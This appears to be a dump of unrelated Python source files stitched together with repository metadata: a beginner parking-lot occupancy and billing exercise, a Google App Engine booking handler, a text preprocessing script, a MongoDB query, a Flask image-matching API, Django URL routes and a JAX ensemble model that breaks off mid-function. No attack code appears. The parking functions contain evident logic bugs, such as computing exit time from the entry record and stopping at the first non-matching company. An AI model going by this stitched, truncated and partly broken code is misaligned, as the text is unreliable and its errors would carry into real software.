def occupancy(parking_data, cutoff_time=None):
"""
Computes the occupancy of the parking at a given time. If no time is
provided, check the current occupancy.
E.g.,
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
occupancy(data, time=datetime.datetime(2017, 12, 12, 7, 13, 45, 0))
is ['LR10GHT']
E.g.,
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
occupancy(data, time=datetime.datetime(2017, 12, 12, 7, 13, 43, 0))
is []
:param parking_data: tuple of list of timestamped arrival and departure
information including license plate. See sample above.
:param time: time (as a datetime.datetime object) at which to check for
occupancy. If no time is provided, use now.
:return: list of cars present in the parking at the given time.
:rtype: list
"""
l_entry = parking_data[0]
l_exit = parking_data[1]
l_time = cutoff_time
l_entered = {}
l_plates = list([])
if l_time is None:
l_time = datetime.datetime.now()
for entry in l_entry:
print(entry)
for i in entry:
print(i)
l_entrytime = entry[0]
l_plate = entry[1]
if l_plate not in l_entered:
l_entered[l_plate] = [l_entrytime]
print(l_entered)
for exits in l_exit:
print(exit)
for i in exits:
print("exit {}".format(i))
l_exittime = exits[0]
l_plate = exits[1]
if l_plate not in l_entered:
l_entered[l_plate] = [l_exittime]
else:
l_entered[l_plate].append(l_exittime)
for key, value in l_entered.items():
print(key)
for index,val in enumerate(value):
if index % 2 == 0:
l_entry = value[index]
try:
l_exit = value[index+1]
except IndexError:
l_exit = datetime.datetime.now()
print(l_entry, l_exit)
if l_exit != [] and l_exit >= l_time:
l_plates.append(key)
return l_plates
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
cutoff_time = datetime.datetime(2000, 1, 3, 12, 0)
occupancy(data, cutoff_time)
data = ([(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')], [])
cutoff_time = datetime.datetime(2000, 1, 3, 12, 0)
occupancy(data, cutoff_time)
def company_bill(parking_data, company_registration, company, t_start, t_end):
"""
Computes the total, cumulated time in seconds, ignoring milliseconds, that
cars registred with a given company stayed in the parking during the
interval between t_start and t_end.
E.g.,
parking_data = (
[(datetime.datetime(2017, 12, 12, 7, 13, 44, 0), 'LR10GHT')],
[(datetime.datetime(2017, 12, 12, 7, 13, 45, 0), 'LR10GHT')]
)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration,
'Shire Tobacco Inc.', …, …)
is 1
:param parking_data: see sample above
:param company_registration: see sample above
:param company: name of the company to compute billing for
:param t_start: start of the billing interval
:param t_end: end of the billing interval
:return: cumulated number of seconds of car park occupancy
:rtype: float | int
"""
l_entry = parking_data[0]
l_exit = parking_data[1]
l_seconds = 0
l_enttime = None
l_exittime = None
for l_company, l_plate in company_registration.items():
if l_company != company:
break # do not continue
l_plates = [x for x in l_plate]
for plate in l_plates:
for t in l_entry:
l_ent = list(t)
if plate in l_ent[1]:
l_enttime = l_ent[0]
else:
l_enttime = None
for e in l_exit:
l_ex = list(e)
if plate in l_ex:
l_exittime = l_ent[0]
else:
l_exittime = None
if (l_enttime is None or l_exittime is None):
return l_seconds
else:
l_seconds = (l_exittime - l_enttime).seconds
return l_seconds
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')],
[(datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')],
[(datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT')], [])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
parking_data = ([(datetime.datetime(2000, 1, 1, 12, 0), 'LR10GHT'), (datetime.datetime(2000, 1, 2, 12, 0), 'LR10GHT'), (datetime.datetime(2000, 1, 3, 12, 0), 'LR10GHT')], [(datetime.datetime(2000, 1, 1, 12, 1), 'LR10GHT'), (datetime.datetime(2000, 1, 2, 12, 1), 'LR10GHT'), (datetime.datetime(2000, 1, 3, 12, 1), 'LR10GHT')])
start_time = datetime.datetime(2000, 1, 3, 12, 0)
end_time = datetime.datetime(2000, 1, 3, 12, 0)
company_registration = {'Shire Tobacco Inc.': ['LR10GHT']}
company_bill(parking_data, company_registration, 'Shire Tobacco Inc.', start_time, end_time)
| ashokpanigrahi88/ashokpython | Exercises/Pre-Programming/parking_management.py | parking_management.py | py | 10,446 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "datetime.datetime",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "datetime.dateti... |
12834655399 | import webapp2
import jinja2
import os
import datetime
from google.appengine.api import users
from google.appengine.ext import ndb
from model import RoomModel, BookingModel
JINJA_ENVIRONMENT = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)),
extensions=['jinja2.ext.autoescape'],
autoescape=True
)
class AddRoom(webapp2.RequestHandler): # Add room class handles for addition of room
def get(self):
self.response.headers['Content-Type'] = 'text/html'
user = users.get_current_user()
if user:
main_header = 'Please Add Room Information Below'
login_logout = 'Logout'
login_logout_url = users.create_logout_url(self.request.uri)
else:
main_header = 'Please Login to Access This Page..!!'
login_logout = 'Login'
login_logout_url = users.create_login_url(self.request.uri)
template_values = {
'main_header': main_header,
'login_logout': login_logout,
'login_logout_url': login_logout_url,
'user': user
}
template = JINJA_ENVIRONMENT.get_template('addRoom.html')
self.response.write(template.render(template_values))
def post(self): # Handles addition of data into ndb
print("Post method of booking")
self.response.headers['Content-Type'] = 'text/html'
user = users.get_current_user()
error_message = ''
if user:
main_header = 'Please Add Room Information Below'
login_logout = 'Logout'
login_logout_url = users.create_logout_url(self.request.uri)
user_given_room_name = self.request.get("room_name")
my_model_key = ndb.Key('RoomModel', user_given_room_name)
my_room = my_model_key.get()
if my_room: # Validating if the room is already present
error_message = 'Room Already exists ! Please use add booking option for booking'
else:
my_room = RoomModel(id=user_given_room_name)
my_room.roomName = user_given_room_name
my_room.createdBy = user.email()
my_room.put()
self.redirect('/')
else:
main_header = 'Please Login to Access This Page..!!'
login_logout = 'Login'
login_logout_url = users.create_login_url(self.request.uri)
template_values = {
'main_header': main_header,
'login_logout': login_logout,
'login_logout_url': login_logout_url,
'user': user,
'error_message': error_message
}
template = JINJA_ENVIRONMENT.get_template('addRoom.html')
self.response.write(template.render(template_values))
class AddBooking(webapp2.RequestHandler): # Handles add booking
def post(self):
self.response.headers['Content-Type'] = 'text/html'
user = users.get_current_user()
error_message = ''
user_given_room_name = self.request.get("room_name")
if user:
main_header = 'Please Add Room Information Below'
login_logout = 'Logout'
login_logout_url = users.create_logout_url(self.request.uri)
page_id = self.request.get("page_id")
if page_id == "addBooking":
user_given_room_name = self.request.get("room_name")
user_room_key = ndb.Key('RoomModel', user_given_room_name)
room_ndb_object = user_room_key.get()
existing_bookings = room_ndb_object.booking
date_time_format = "%Y-%m-%dT%H:%M"
# Read user inputs
new_start_date = self.request.get("startDate")
new_start_time = self.request.get("startTime")
new_end_date = self.request.get("endDate")
new_end_time = self.request.get("endTime")
new_booking_id = self.request.get("bookingId")
# Convert user input to date format
new_start_date_time = datetime.datetime.strptime(new_start_date + "T" + new_start_time,
date_time_format)
new_end_date_time = datetime.datetime.strptime(new_end_date+"T"+new_end_time, date_time_format)
add_booking_flag = True
print(new_start_date_time)
print(new_end_date_time)
if new_start_date_time >= new_end_date_time: # Check for start date and time
add_booking_flag = False
error_message = "Start Time should always be greater than End Time"
if add_booking_flag and (new_start_date_time < datetime.datetime.now()): # Check for past Bookings
add_booking_flag = False
error_message = "No past bookings allowed. Current time is : {0} GMT(No daylight savings)".format(
datetime.datetime.now().strftime("%Y-%m-%d %H:%M"))
# Check for add_booking_flag which will be false if any of above conditions are true.!
if add_booking_flag is True:
for each_booking in existing_bookings:
existing_start_date_time = each_booking.startTime
existing_end_date_time = each_booking.endTime
existing_booking_id = each_booking.bookingId
if existing_booking_id == new_booking_id:
add_booking_flag = False
error_message = "Please select unique Booking id. Booking already exists"
break
if new_start_date_time <= existing_end_date_time and \
new_end_date_time >= existing_start_date_time:
add_booking_flag = False
error_message = "Booking Overlaps, " \
"Please view bookings and make new non-overlapping booking"
break
if add_booking_flag: # Checks if the booking has passed all the checks,
# if yes, will be persisted to ndb
new_booking = BookingModel(startTime=new_start_date_time,
endTime=new_end_date_time,
bookingId=new_booking_id,
userCreated=user.email()
) # type: BookingModel
room_ndb_object.booking.append(new_booking)
room_ndb_object.put()
self.redirect('/')
else:
main_header = 'Please Login to Access This Page..!!'
login_logout = 'Login'
login_logout_url = users.create_login_url(self.request.uri)
template_values = {
'main_header': main_header,
'login_logout': login_logout,
'login_logout_url': login_logout_url,
'user': user,
'error_message': error_message,
'room_name': user_given_room_name
}
template = JINJA_ENVIRONMENT.get_template('addBooking.html')
self.response.write(template.render(template_values))
| hari-ar/cc_assignment2 | add.py | add.py | py | 7,428 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "jinja2.Environment",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "jinja2.FileSystemLoader",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path.dirname",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "os.path",
... |
3460040213 | import numpy as np
import pandas as pd
import sys
import os
import logging
import math
NUMBER_CHAR = 1000
def get_logger(name):
_log_format = f"%(asctime)s - [%(levelname)s] - %(name)s - (%(filename)s).%(funcName)s(%(lineno)d) - %(message)s"
def get_file_handler():
file_handler = logging.FileHandler("x.log")
file_handler.setLevel(logging.WARNING)
file_handler.setFormatter(logging.Formatter(_log_format))
return file_handler
def get_stream_handler():
stream_handler = logging.StreamHandler()
stream_handler.setLevel(logging.INFO)
stream_handler.setFormatter(logging.Formatter(_log_format))
return stream_handler
def_logger = logging.getLogger(name)
def_logger.setLevel(logging.INFO)
#def_logger.addHandler(get_file_handler())
def_logger.addHandler(get_stream_handler())
return def_logger
def get_names():
names = {
'input_test_file': root_dir + "dissertation_test.csv",
'input_file': root_dir + "dissertation.csv",
'all_set_char_file': root_dir + "all_set_char.txt",
'dict_oecds_file': root_dir + "dict_oecds.csv"
}
return names
def get_column(input_file, column):
df = pd.read_csv(input_file)
return df[column]
def show_plot(distribution):
import matplotlib.pyplot as plt
fig, ax = plt.subplots()
fig.canvas.set_window_title('Диаграмма количества ключевых слов')
ax.bar(distribution.keys(), distribution.values())
ax.set_facecolor('seashell')
fig.set_facecolor('floralwhite')
fig.set_figwidth(12) # ширина Figure
fig.set_figheight(6) # высота Figure
ax.set_xlabel('Длинна текста')
ax.set_ylabel('Частота использования ключевых слов')
plt.show()
def len_split(x) -> int:
try:
return len(x.split(sep=', '))#chr(0x1f)))
except AttributeError:
return 0
def show_distribution(df_abstract, operatinon=len):
distribution = {}
for i, text in enumerate(df_abstract):
try:
l = operatinon(text)
except TypeError:
print(i, text)
if l in distribution:
distribution[l] += 1
else:
distribution[l] = 1
print(max(distribution.keys()))
print(distribution)
show_plot(distribution)
def create_char_dict(set_char_filename, df_abstract):
all_set_char = set()
print(len(df_abstract))
for text in df_abstract:
try:
all_set_char = all_set_char.union(set(text))
# all_set_char = all_set_char.union(set(text.split()))
except TypeError:
continue
except AttributeError:
continue
all_set_char = sorted(list(set(str(all_set_char).lower())))
str_char = ''
for char in all_set_char:
str_char += f'{ord(char)} - ' + char + '\n' #chr(0x1f)
#str_char = str_char[:-1]
with open(set_char_filename, 'w') as f:
f.write(str_char)
# print(all_set_char)
# print(f"len(all_set_char): {len(all_set_char)}")
return all_set_char
def prepare_data(tuple_char, abstract):
"""
Create list with index char in tuple_char.
:param tuple_char:
:param abstract:
:return: indexes
"""
indexes = []
try:
for char in abstract.lower():
try:
ind = tuple_char[0].index(char)
except ValueError:
if char in tuple_char[1]:
ind = len(tuple_char)
elif char in tuple_char[2]:
ind = len(tuple_char) + 1
else:
# logger.info(f'special symbol: {char}')
ind = None
indexes.append(ind)
except AttributeError :
logger.warning(f'NaN in abstract: {abstract}')
pass
if len(indexes) > NUMBER_CHAR:
indexes = indexes[:1000]
# print(indexes)
# print(len(indexes))
return indexes
def quantization_abstract(indexes, tuple_char):
quantum_abstract = np.zeros((NUMBER_CHAR, (len(tuple_char[0]) + len(tuple_char) - 1)), bool)
for i, ind in enumerate(indexes):
if ind:
quantum_abstract[i][ind] = True
return quantum_abstract
def quantization_oecds(oecds, dict_oecds):
quantum_oecds = np.zeros(len(dict_oecds), bool)
try:
splited_oecds = oecds.split(sep=', ')
for oecd in splited_oecds:
quantum_oecds[dict_oecds[oecd.lower()]] = True
except AttributeError:
logger.warning(f'NaN in oecds')
raise(f'NaN in oecds')
return quantum_oecds
def get_tuple_char():
"""
Tuple_char is tuple ((alphabetical), (upper), (lower), (latin))
alphabetical - is real index. (tuple_char.index(char))
(upper), (lower), (latin) - len(tuple_char), len(tuple_char) + 1,len(tuple_char) + 2.
:return:
"""
tuple_char = (
(' ', '!', '"', '#', '$', '%', '&', "'", '(', ')', '*', '+', ',', '-', '.', '/',
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', ':', ';', '<', '=', '>',
'?', '@', '[', '\\', ']', '^', '_', '`',
'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o',
'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',
'{', '|', '}', '~',
'а', 'б', 'в', 'г', 'д', 'е', 'ж', 'з', 'и', 'й', 'к', 'л', 'м', 'н', 'о',
'п', 'р', 'с', 'т', 'у', 'ф', 'х', 'ц', 'ч', 'ш', 'щ', 'ъ', 'ы', 'ь', 'э',
'ю', 'я', 'ё'),
('⁰', '¹', '²', '³', '⁴', '⁵', '⁶', '⁷', '⁸', '⁹', '⁺', '⁻', '⁼', '⁽', '⁾', 'ⁿ'),
('₀', '₁', '₂', '₃', '₄', '₅', '₆', '₇', '₈', '₉', '₊', '₋', '₌', '₍', '₎', 'ₒ', 'ₓ', 'ₙ'),
('α', 'β', 'γ', 'δ', 'ε', 'ζ', 'η', 'θ', 'ι', 'κ', 'λ', 'μ', 'ν', 'ξ', 'ο',
'π', 'ρ', 'ς', 'σ', 'τ', 'φ', 'χ', 'ψ', 'ω')
)
return tuple_char
def create_dict_oecds(df_oecds, dict_oecds_file):
list_oecd = []
for oecds in df_oecds:
#print(oecds)
try:
splited_oecds = oecds.split(sep=', ')
for oecd in splited_oecds:
list_oecd.append(oecd.lower())
except AttributeError:
logger.warning(f'NaN in oecds')
list_oecd = sorted(list(set(list_oecd)))
print(list_oecd)
print(len(list_oecd))
df_dict_oecds = pd.DataFrame()
df_dict_oecds.index.name = 'index'
df_dict_oecds['uniq_oecds'] = list_oecd
df_dict_oecds.to_csv(dict_oecds_file)
logger.info(f"Done!")
dict_oecds = {}
for i, oecd in enumerate(list_oecd):
dict_oecds[oecd] = i
return dict_oecds
def main():
names = get_names()
# df_abstract_oecds = get_column(names['input_test_file'], ['abstract', 'oecds.0'])
df_abstract_oecds = get_column(names['input_file'], ['abstract', 'oecds.0'])
# show_distribution(df_abstract)
#all_set_char = create_char_dict(names['all_set_char_file'], df_abstract)
tuple_char = get_tuple_char()
quantum_abstracts = []
quantum_oecds = []
len_df_abstract = len(df_abstract_oecds['abstract'])
dict_oecds = create_dict_oecds(df_abstract_oecds['oecds.0'], names['dict_oecds_file'])
#get_oecds_tokinizer(df_abstract_oecds['oecds.0'])
for i, (abstract, oecds) in enumerate(zip(df_abstract_oecds['abstract'], df_abstract_oecds['oecds.0'])):
if i%1000 == 0:
print(f'{i}/{len_df_abstract}')
if abstract is np.NaN or oecds is np.NaN:
# list_keyword.append(np.NaN)
continue
indexes = prepare_data(tuple_char, abstract)
quantum_abstracts.append(quantization_abstract(indexes, tuple_char))
quantum_oecds.append(quantization_oecds(oecds, dict_oecds))
#sys.exit()
# df_oecds = get_column(input_file, 'oecds.0')
# show_distribution(df_oecds, len_split)
if __name__ == '__main__':
root_dir = os.path.split(sys.argv[0])[0] + '/'
logger = get_logger(__name__)
main()
| Dif13/Thesis_clustering | prepare_abstract.py | prepare_abstract.py | py | 8,101 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.FileHandler",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "logging.WARNING",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "logging.Formatter",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "logging.St... |
42910154667 | import pymongo
from pymongo import MongoClient
import time
import pprint
client = MongoClient('localhost', 27017)
db = client['sahamyab']
series_collection = db['tweets']
### Adding index to field
series_collection.create_index([("mediaContentType", pymongo.DESCENDING), ("parentId", pymongo.DESCENDING)])
start_time = time.time()
res = series_collection.find({
'$and':[
{'mediaContentType':'image/jpeg'}, {'parentId':{ '$exists': True } }
]}, {"senderName": 1, '_id':0})
end_time = time.time()
delta_time = end_time - start_time
print('run time:', delta_time)
lis = []
for i in res:
lis.append(i['senderName'])
pprint.pprint(i)
| masoudrahimi39/Big-Data-Hands-On-Projects | NoSQL Databases (Cassandra, MongoDB, Neo4j, Elasticsearch)/MongoDB/1000 twiits/game5_1.py | game5_1.py | py | 674 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pymongo.MongoClient",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "pymongo.DESCENDING",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "time.time",
... |
23760421272 | import os
import cv2
import numpy as np
from flask import Flask, request, jsonify
from src.preprocessing import segment_image, match_template
app = Flask(__name__)
@app.route("/", methods=["GET"])
def test():
return "API Working"
@app.route("/match", methods=["GET"])
def similar_template():
test_image_path = request.args["image_path"]
TEMPLATE_DIR = request.args["template_folder_path"]
template_image_file = [
os.path.join(TEMPLATE_DIR, item) for item in os.listdir(TEMPLATE_DIR)
]
image_segment = segment_image(test_image_path).compute()
template_score = []
template_name = []
for template_image in template_image_file:
template = cv2.imread(template_image)
gray_image = cv2.cvtColor(template, cv2.COLOR_BGR2GRAY)
cumul_point = 0
for segment in image_segment:
cumul_point = cumul_point + match_template(
segment,
gray_image).compute()
template_score.append(cumul_point)
template_name.append(template_image)
output = {
"input_filename": test_image_path,
"template_file_name": template_name[np.argmax(template_score)],
}
return jsonify(output)
if __name__ == "__main__":
app.run(debug=True, host="0.0.0.0", port=5000)
| sharmaanix/Template_similarity | main.py | main.py | py | 1,297 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "flask.request.args",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "flask.request.args",... |
32951669757 | from django.urls import include, path
from rest_framework.authtoken import views
from rest_framework.routers import DefaultRouter
from api.views import (CreateUserView, FollowViewSet, IngredientViewSet,
RecipeViewSet, TagViewSet)
app_name = 'api'
router_v1 = DefaultRouter()
router_v1.register('users', CreateUserView, basename='users')
router_v1.register('tags', TagViewSet, basename='tags')
router_v1.register('recipes', RecipeViewSet, basename='recipes')
router_v1.register('ingredients', IngredientViewSet, basename='ingredients')
urlpatterns = [
path('users/<users_id>/subscribe/',
FollowViewSet.as_view({'post': 'create',
'delete': 'delete'}), name='subscribe'),
path('users/subscriptions/',
FollowViewSet.as_view({'get': 'list'}), name='subscriptions'),
path('', include(router_v1.urls)),
path('auth/', include('djoser.urls.authtoken')),
path('api-token-auth/', views.obtain_auth_token),
]
| IvanGolenko/foodgram-project-react | backend/api/urls.py | urls.py | py | 994 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "rest_framework.routers.DefaultRouter",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "api.views.CreateUserView",
"line_number": 11,
"usage_type": "argument"
},
{
"api_name": "api.views.TagViewSet",
"line_number": 12,
"usage_type": "argument"
},... |
71121036264 | from django.contrib import admin
from django.urls import path,include
from .views import Login_View,Register_Voew,logout_view,Info_Profile,Info_Reply
app_name='user'
urlpatterns = [
path('login/',Login_View.as_view(),name='login'),
path('register/',Register_Voew.as_view(),name='register'),
path('logout/',logout_view,name='logout'),
path('user/<str:username1>/',Info_Profile.as_view(),name='infoprofile'),
path('reply/<str:username1>/',Info_Reply.as_view(),name='inforeply'),
] | reBiocoder/bioforum | user/urls.py | urls.py | py | 500 | python | en | code | 22 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.Login_View.as_view",
"line_number": 7,
"usage_type": "call"
},
{
"api_name": "views.Login_View",
"line_number": 7,
"usage_type": "name"
},
{
"api_name": "django.urls.p... |
17115671884 | from typing import Sequence, Callable, Union
import jax.numpy as jnp
from flax import linen as nn
from jax import jit, vmap, value_and_grad
from mbse.utils.network_utils import MLP
import jax
from mbse.utils.utils import gaussian_log_likelihood, rbf_kernel
import optax
from jax.scipy.stats import norm
EPS = 1e-6
def _predict(apply_fn, params, x, sig_max, sig_min, rng=None, deterministic=False):
forward = jax.vmap(apply_fn, (0, None))
predictions = forward(params, x)
mu, sig = jnp.split(predictions, 2, axis=-1)
sig = nn.softplus(sig)
sig = jnp.clip(sig, 0, sig_max) + sig_min
eps = jnp.ones_like(sig) * sig_min
sig = (1 - deterministic) * sig + deterministic * eps
predictions = jnp.concatenate([mu, sig], axis=-1)
return predictions
class ProbabilisticEnsembleModel(object):
def __init__(
self,
example_input: jnp.ndarray,
num_ensemble: int = 10,
features: Sequence[int] = [256, 256],
output_dim: int = 1,
non_linearity: Callable = nn.swish,
lr: float = 1e-3,
weight_decay: float = 1e-4,
seed: int = 0,
sig_min: float = 1e-3,
sig_max: float = 1e3,
deterministic: bool = False,
initialize_train_fn: bool = True,
):
self.output_dim = output_dim
self.mlp = MLP(
features=features,
output_dim=2 * output_dim,
non_linearity=non_linearity
)
self.num_ensembles = num_ensemble
# vmap init function with respect to seed sequence
init = vmap(self.mlp.init, (0, None))
self.net = self.mlp.apply
self.rng = jax.random.PRNGKey(seed)
seed_sequence = jax.random.split(self.rng, self.num_ensembles + 1)
self.rng = seed_sequence[0]
seed_sequence = seed_sequence[1:]
particles = init(seed_sequence, example_input)
self.sig_min = sig_min
self.sig_max = sig_max
self.optimizer = optax.adamw(learning_rate=lr,
weight_decay=weight_decay)
optimizer_state = self.optimizer.init(particles)
self.particles = particles
self.opt_state = optimizer_state
self.init_particles = particles
self.init_opt_state = optimizer_state
self.example_input = example_input
self._predict = jit(lambda params, x:
_predict(
apply_fn=self.net,
params=params,
x=x,
sig_max=self.sig_max,
sig_min=self.sig_min,
deterministic=deterministic,
)
)
self.num_ps = 10
if initialize_train_fn:
self._train_step = jit(lambda params, opt_state, x, y: self._train_fn(
predict_fn=self._predict,
update_fn=self.optimizer.update,
params=params,
opt_state=opt_state,
x=x,
y=y,
))
def calculate_calibration_score(params, xs, ys, ps, alpha):
return self._calculate_calibration_score(
predict_fn=self._predict,
params=params,
xs=xs,
ys=ys,
ps=ps,
alpha=alpha,
output_dim=self.output_dim,
)
self.calculate_calibration_score_fn = calculate_calibration_score
def calibration_errors(params, xs, ys, ps, alpha):
return self._calibration_errors(
calibration_score_fn=self.calculate_calibration_score_fn,
params=params,
xs=xs,
ys=ys,
ps=ps,
alpha=alpha,
output_dim=self.output_dim,
)
self.calibration_errors = calibration_errors
def calculate_calibration_alpha(params, xs, ys):
return self._calculate_calibration_alpha(
calibration_error_fn=self.calibration_errors,
params=params,
xs=xs,
ys=ys,
num_ps=self.num_ps,
output_dim=self.output_dim,
)
self.calculate_calibration_alpha = jax.jit(calculate_calibration_alpha)
@property
def params(self):
return self.particles
def predict(self, x):
return self._predict(self.particles, x)
@staticmethod
def _train_fn(predict_fn, update_fn, params, opt_state, x, y, prior_particles=None):
likelihood = jax.vmap(gaussian_log_likelihood, in_axes=(None, 0, 0), out_axes=0)
def likelihood_loss(model_params):
predictions = predict_fn(model_params, x)
mu, sig = jnp.split(predictions, 2, axis=-1)
logl = likelihood(y, mu, sig)
return -logl.mean()
# vmap over ensemble
loss, grads = value_and_grad(likelihood_loss)(params)
updates, new_opt_state = update_fn(grads,
opt_state,
params=params)
new_params = optax.apply_updates(params, updates)
grad_norm = optax.global_norm(grads)
return new_params, new_opt_state, loss, grad_norm
def train_step(self, x, y):
new_params, new_opt_state, loss, grad_norm = self._train_step(
params=self.particles,
opt_state=self.opt_state,
x=x,
y=y
)
self.particles = new_params
self.opt_state = new_opt_state
return loss, grad_norm
@staticmethod
def _calculate_calibration_alpha(calibration_error_fn, params, xs, ys, num_ps, output_dim) -> jax.Array:
# We flip so that we rather take more uncertainty model than less
ps = jnp.linspace(0, 1, num_ps + 1)[1:]
test_alpha = jnp.flip(jnp.linspace(0, 10, 100)[1:])
test_alphas = jnp.repeat(test_alpha[..., jnp.newaxis], repeats=output_dim, axis=1)
errors = vmap(calibration_error_fn, in_axes=(None, None, None, None, 0))(
params, xs, ys, ps, test_alphas)
indices = jnp.argmin(errors, axis=0)
best_alpha = test_alpha[indices]
assert best_alpha.shape == (output_dim,)
return best_alpha, jnp.diag(errors[indices])
@staticmethod
def _calibration_errors(calibration_score_fn, params, xs, ys, ps, alpha, output_dim) -> jax.Array:
ps_hat = calibration_score_fn(params, xs, ys, ps, alpha)
ps = jnp.repeat(ps[..., jnp.newaxis], repeats=output_dim, axis=1)
return jnp.mean((ps - ps_hat) ** 2, axis=0)
@staticmethod
def _calculate_calibration_score(predict_fn, params, xs, ys, ps, alpha, output_dim):
assert alpha.shape == (output_dim,)
def calculate_score(x, y):
predictions = predict_fn(params, x)
mean, std = jnp.split(predictions, 2, axis=-1)
mu = jnp.mean(mean, axis=0)
eps_std = jnp.std(mean, axis=0)
al_uncertainty = jnp.sqrt(jnp.mean(jnp.square(std), axis=0))
cdfs = vmap(norm.cdf)(y, mu, eps_std * alpha + al_uncertainty)
def check_cdf(cdf):
assert cdf.shape == ()
return cdf <= ps
return vmap(check_cdf, out_axes=1)(cdfs)
cdfs = vmap(calculate_score)(xs, ys)
return jnp.mean(cdfs, axis=0)
class FSVGDEnsemble(ProbabilisticEnsembleModel):
def __init__(self,
n_prior_particles: Union[int, None] = None,
prior_bandwidth: float = None,
k_bandwidth: float = 0.1,
initialize_train_fn: bool = True,
*args, **kwargs):
super(FSVGDEnsemble, self).__init__(*args, **kwargs, initialize_train_fn=False)
n_prior_particles = n_prior_particles or self.num_ensembles
init = vmap(self.mlp.init, (0, None))
seed_sequence = jax.random.split(self.rng, n_prior_particles + 1)
self.rng = seed_sequence[0]
seed_sequence = seed_sequence[1:]
self.priors = init(seed_sequence, self.example_input)
self.prior_bandwidth = prior_bandwidth
self.k_bandwidth = k_bandwidth
if initialize_train_fn:
def train_step(
params,
opt_state,
x,
y,
prior_particles,
rng,
):
return self._train_fn(predict_fn=self._predict,
update_fn=self.optimizer.update,
params=params,
opt_state=opt_state,
x=x,
y=y,
prior_particles=prior_particles,
rng=rng,
prior_bandwidth=self.prior_bandwidth,
k_bandwidth=self.k_bandwidth,
)
self._train_step = jit(train_step)
def _prior(self, prior_particles, x):
predictions = self._predict(prior_particles, x)
altered_predictions = predictions
altered_predictions = altered_predictions.at[..., self.output_dim:].set(
jnp.log(altered_predictions[..., self.output_dim:] + EPS))
var = jax.vmap(lambda x: jnp.cov(x, rowvar=False),
in_axes=-1,
out_axes=-1)(altered_predictions)
mean = jnp.mean(altered_predictions, axis=0)
return mean, var
@staticmethod
def _train_fn(
predict_fn,
update_fn,
params,
opt_state,
x,
y,
prior_particles,
rng,
prior_bandwidth,
k_bandwidth
):
# mean_prior, k_prior = self._prior(prior_particles, x)
rbf = lambda z, v: rbf_kernel(z, v, bandwidth=prior_bandwidth)
kernel = lambda x: rbf(x, x) # K(x, x)
k_prior = kernel(x)
k_prior = jnp.stack([k_prior, k_prior], axis=-1)
k_rbf = lambda z, v: rbf_kernel(z, v, bandwidth=k_bandwidth)
def fsvgdloss(model_params):
predictions, pred_vjp = jax.vjp(lambda p: predict_fn(p, x), model_params)
k_pred, k_pred_vjp = jax.vjp(
lambda x: k_rbf(x, predictions), predictions)
grad_k = k_pred_vjp(-jnp.ones(k_pred.shape))[0]
def neg_log_post(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_post = gaussian_log_likelihood(y, mean_pred, std_pred)
return -log_post.mean()
likelihood = lambda x, cov_x: \
jax.scipy.stats.multivariate_normal.logpdf(x,
mean=jnp.zeros(x.shape[0]),
cov=cov_x + 1e-4 * jnp.eye(x.shape[0]))
likelihood = jax.vmap(likelihood, in_axes=-1, out_axes=-1)
def neg_log_prior(predictions):
mean_pred, std_pred = jnp.split(predictions, 2, axis=-1)
log_sigma = jnp.log(std_pred + EPS)
altered_predictions = jnp.stack([mean_pred, log_sigma], axis=-1)
log_prior = likelihood(altered_predictions, k_prior)
